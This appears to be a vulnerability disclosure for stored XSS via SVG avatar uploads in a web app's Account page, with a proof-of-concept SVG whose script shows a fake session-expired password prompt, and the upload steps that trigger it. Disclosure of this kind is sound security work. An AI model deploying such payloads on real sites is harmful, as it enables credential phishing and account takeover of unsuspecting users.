Stored XSS via upload Photo avatar with format .svg
inAccount data.
When opening the attachment, some format files will be rendered and loaded on the browser. So it allows executing arbitrary javascript code that was injected into attachment before.
PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script>
var xss = prompt("Hi user!\nYour session is expired, please enter password to login again!");
if (xss != null) {
alert("Your password is: " + xss);
}
</script>
</svg>
1.After login, click the name on the top right corner -> go to Account
2.In Account data tab, scroll down to the bottom
3.In the Photo section, clickChoose fileand choose the PoC.svg
then clickUpdate
4.After uploading successfully, copy the link to that image and open it in a new tab.
The XSS will trigger when the attachment is opened in a new tab.
This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the userβs device.